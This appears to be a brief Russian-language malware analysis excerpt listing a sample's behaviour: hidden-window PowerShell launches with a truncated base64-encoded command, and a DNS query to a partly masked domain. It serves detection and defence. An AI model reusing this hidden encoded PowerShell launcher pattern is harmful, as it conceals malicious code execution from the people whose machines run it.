Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADQANAB9AHsAOAAyAH0AewA0ADAAfQB7ADAAfQB7ADYAMgB9AHsAMgA5AH0AewAzADYAfQB7ADcANQB9AHsANQA0AH0AewAzADgAfQB7ADgANgB9AHsANgA4AH0AewA1ADcAfQB7ADEAMQB9AHsAMQA5AH0Aew...
- DNS ASK bn###wehquw.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADQANAB9AHsAOAAyAH0AewA0ADAAfQB7ADAAfQB7ADYAMgB9AHsAMgA5AH0AewAzADYAfQB7ADcANQB9AHsANQA0AH0AewAzADgAfQB7ADgANgB9AHsANgA4AH0AewA1ADcAfQB7ADEAMQB9AHsAMQA5AH0Aew...' (со скрытым окном)